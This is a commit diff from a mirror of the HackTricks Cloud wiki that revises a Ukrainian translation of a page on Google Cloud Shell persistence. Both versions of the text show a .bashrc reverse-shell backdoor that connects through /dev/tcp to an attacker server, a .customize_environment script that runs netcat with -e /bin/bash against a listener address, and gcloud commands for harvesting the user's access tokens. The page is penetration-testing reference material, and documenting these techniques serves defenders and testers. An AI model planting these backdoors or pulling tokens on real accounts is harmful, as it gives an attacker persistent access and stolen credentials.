mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-16 06:42:39 -08:00
Translated ['.github/pull_request_template.md', 'src/README.md', 'src/pe
This commit is contained in:
@@ -19,32 +19,32 @@
|
||||
Ця консоль має деякі цікаві можливості для атакуючих:
|
||||
|
||||
1. **Будь-який користувач Google з доступом до Google Cloud** має доступ до повністю автентифікованого екземпляра Cloud Shell (Службові облікові записи можуть, навіть будучи власниками організації).
|
||||
2. Вказаний екземпляр **зберігатиме свій домашній каталог принаймні 120 днів**, якщо не буде жодної активності.
|
||||
2. Цей екземпляр **зберігатиме свою домашню директорію принаймні 120 днів**, якщо не буде жодної активності.
|
||||
3. **Немає можливостей для організації моніторити** активність цього екземпляра.
|
||||
|
||||
Це в основному означає, що атакуючий може помістити бекдор у домашній каталог користувача, і поки користувач підключається до GC Shell принаймні кожні 120 днів, бекдор виживе, і атакуючий отримає оболонку щоразу, коли вона запускається, просто виконавши:
|
||||
Це в основному означає, що атакуючий може помістити бекдор у домашню директорію користувача, і поки користувач підключається до GC Shell принаймні кожні 120 днів, бекдор виживе, і атакуючий отримає оболонку щоразу, коли вона запускається, просто виконавши:
|
||||
```bash
|
||||
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
|
||||
```
|
||||
Є ще один файл у домашній папці під назвою **`.customize_environment`**, який, якщо існує, буде **виконуватись щоразу**, коли користувач отримує доступ до **cloud shell** (як у попередній техніці). Просто вставте попередній бекдор або один подібний, щоб підтримувати стійкість, поки користувач "часто" використовує cloud shell:
|
||||
В домашній папці є ще один файл під назвою **`.customize_environment`**, який, якщо існує, буде **виконуватись щоразу**, коли користувач отримує доступ до **cloud shell** (як у попередній техніці). Просто вставте попередній бекдор або один з наступних, щоб підтримувати стійкість, поки користувач "часто" використовує cloud shell:
|
||||
```bash
|
||||
#!/bin/sh
|
||||
apt-get install netcat -y
|
||||
nc <LISTENER-ADDR> 443 -e /bin/bash
|
||||
```
|
||||
> [!WARNING]
|
||||
> Важливо зазначити, що **перший раз, коли виконується дія, що вимагає аутентифікації**, у браузері користувача з'являється вікно авторизації. Це вікно потрібно прийняти, перш ніж команда зможе виконатися. Якщо з'явиться несподіване спливаюче вікно, це може викликати підозру і потенційно скомпрометувати метод збереження.
|
||||
> Важливо зазначити, що **перший раз, коли виконується дія, що вимагає аутентифікації**, у браузері користувача з'являється вікно авторизації. Це вікно потрібно прийняти, перш ніж команда зможе виконатися. Якщо з'явиться несподіване вікно, це може викликати підозру і потенційно скомпрометувати метод збереження.
|
||||
|
||||
Це спливаюче вікно від виконання `gcloud projects list` з cloud shell (як атакуючий), яке видно в сеансі браузера користувача:
|
||||
Це вікно з'являється при виконанні `gcloud projects list` з cloud shell (як атакуючий), яке видно в сеансі браузера користувача:
|
||||
|
||||
<figure><img src="../../../images/image (10).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Однак, якщо користувач активно використовував cloudshell, спливаюче вікно не з'явиться, і ви можете **збирати токени користувача за допомогою**:
|
||||
Однак, якщо користувач активно використовував cloudshell, вікно не з'явиться, і ви можете **збирати токени користувача за допомогою**:
|
||||
```bash
|
||||
gcloud auth print-access-token
|
||||
gcloud auth application-default print-access-token
|
||||
```
|
||||
#### Як встановлюється SSH-з'єднання
|
||||
#### Як встановлюється з'єднання SSH
|
||||
|
||||
В основному, використовуються ці 3 API виклики:
|
||||
|
||||
|
||||
Reference in New Issue
Block a user